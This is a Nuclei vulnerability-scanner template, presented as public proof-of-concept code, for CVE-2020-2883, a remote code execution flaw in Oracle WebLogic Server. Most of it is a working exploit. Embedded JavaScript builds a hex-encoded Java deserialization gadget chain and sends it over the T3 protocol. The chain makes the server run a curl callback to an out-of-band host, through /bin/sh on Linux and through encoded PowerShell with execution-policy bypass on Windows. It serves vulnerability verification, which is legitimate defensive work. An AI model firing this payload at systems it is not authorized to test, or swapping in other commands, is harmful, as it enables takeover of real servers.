Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
PoC代码[已公开]
id: CVE-2020-2883
info:
name: Oracle WebLogic Server - Remote Code Execution
author: daffainfo
severity: critical
description: |
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
reference:
- http://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://www.zerodayinitiative.com/advisories/ZDI-20-504/
- https://www.zerodayinitiative.com/advisories/ZDI-20-570/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
- https://nvd.nist.gov/vuln/detail/CVE-2020-2883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-2883
cwe-id: CWE-502
epss-score: 0.94398
epss-percentile: 0.99972
cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: oracle
product: weblogic_server
shodan-query: product:"oracle weblogic"
tags: cve,cve2020,oracle,weblogic,javascript,rce,intrusive,kev,vkev,vuln
flow: http(1) && javascript(1)
http:
- method: GET
path:
- '{{BaseURL}}/console/login/LoginForm.jsp'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains_any(body, "10.3.6.0", "12.1.3.0", "12.2.1.3", "12.2.1.4")'
- 'contains(body, "WebLogic Server Version:")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- 'WebLogic\s+Server\s+Version:\s+([0-9.]+)'
internal: true
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const m = require('nuclei/net');
const command1 = "/bin/sh -c curl http://" + oast;
const command2 = "cmd.exe /c powershell.exe -nop -ep bypass -e " + btoa("curl http://" + oast);
const address = Host+":"+Port;
const version = template.version;
let conn, conn2;
conn = m.Open('tcp', address);
conn2 = m.Open('tcp', address);
function extractorCompUid(versionNo) {
switch (versionNo) {
case '12.1.3.0.0':
return 'c7ad6d3a676f3c18';
case '12.2.1.3.0':
return 'fb4ac83df1d72edc';
default:
return 'f9b3bc58cc52cd21';
}
}
function chainedExtractorUid(versionNo) {
switch (versionNo) {
case '12.1.3.0.0':
return '889f81b0945d5b7f';
case '12.2.1.3.0':
return '06ee10433a4cc4b4';
default:
return '435b250b72f63db5';
}
}
function abstractExtractorUid(versionNo) {
switch (versionNo) {
case '12.1.3.0.0':
return '658195303e723821';
case '12.2.1.3.0':
return '752289ad4d460138';
default:
return '9b1be18ed70100e5';
}
}
function reflectionExtractorUid(versionNo) {
switch (versionNo) {
case '12.1.3.0.0':
return 'ee7ae995c02fb4a2';
case '12.2.1.3.0':
return '87973791b26429dd';
default:
return '1f62f564b951b614';
}
}
function reflectExtractCount(versionNo) {
return versionNo === '12.2.1.3.0' ? '3' : '2';
}
function changeHandle(versionNo) {
return versionNo === '12.2.1.3.0' ? '007e0012' : '007e0011';
}
function addSect(versionNo) {
return versionNo === '12.2.1.3.0' ? '4c00116d5f657874726163746f724361636865647400124c6a6176612f6c616e672f4f626a6563743b' : '';
}
function addTcNull(versionNo) {
return versionNo === '12.2.1.3.0' ? '70' : '';
}
function t3_send(payload_obj) {
let request_obj = '000009f3016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000'
+ payload_obj
+ 'fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078'
const newLen = (parseInt(request_obj.length / 2)).toString(16).padStart(8, '0');
request_obj = newLen + request_obj.slice(8);
return request_obj;
}
function formatPayload(payloadCmd) {
const parts = payloadCmd.split(' ');
const first = parts[0] || '';
const second = parts[1] || '';
const rest = parts.slice(2).join(' ') || '';
return [first, second, rest].map(part => {
const lenHex = part.length.toString(16).padStart(4, '0');
const partHex = [...part].map(c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
return '74' + lenHex + partHex;
}).join('');
}
function buildPayloadObj(payload_data) {
let payload_obj = 'aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b78700000000273720030636f6d2e74616e676f736f6c2e7574696c2e636f6d70617261746f722e457874726163746f72436f6d70617261746f72'
+ extractorCompUid(version)
+ '0200014c000b6d5f657874726163746f727400224c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b78707372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72'
+ chainedExtractorUid(version)
+ '02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72'
+ abstractExtractorUid(version)
+ '0200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000037372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72'
+ reflectionExtractorUid(version)
+ '02000'
+ reflectExtractCount(version)
+ '5b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b'
+ addSect(version)
+ '4c00096d5f734d6574686f647400124c6a6176612f6c616e672f537472696e673b7871007e000900000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000000'
+ addTcNull(version)
+ '7400096765744d6574686f647371007e000d000000007571'
+ changeHandle(version)
+ '00000002707571'
+ changeHandle(version)
+ '00000000'
+ addTcNull(version)
+ '740006696e766f6b657371007e000d000000007571'
+ changeHandle(version)
+ '00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000003'
// Insert payload here
+ formatPayload(payload_data)
+ addTcNull(version)
+ '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178';
return payload_obj;
}
let shake = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
// For linux
conn.SendHex(shake);
let resp = conn.RecvString();
Export(resp);
let linux_obj = buildPayloadObj(command1);
linux_payload = t3_send(linux_obj);
conn.SendHex(linux_payload);
conn.Close();
// For windows
conn2.SendHex(shake);
let resp2 = conn2.RecvString();
Export(resp2);
let windows_obj = buildPayloadObj(command2);
windows_payload = t3_send(windows_obj);
conn2.SendHex(windows_payload);
conn2.Close();
args:
Host: "{{Host}}"
Port: 7001
oast: "{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- "success == true"
- "contains(response, 'HELO:')"
- "contains(interactsh_protocol, 'http')"
condition: and
# digest: 4a0a00473045022029d4e3247544ec0e5deed905597c8f708537c22f620df0767c3bbee8e9c6c0140221008096a9f23b83ef152839b3f5215bf1e2a4b6b9b7ab4b12337ee9e016aa84bdc5:922c64590222798bb761d5b6d8e72950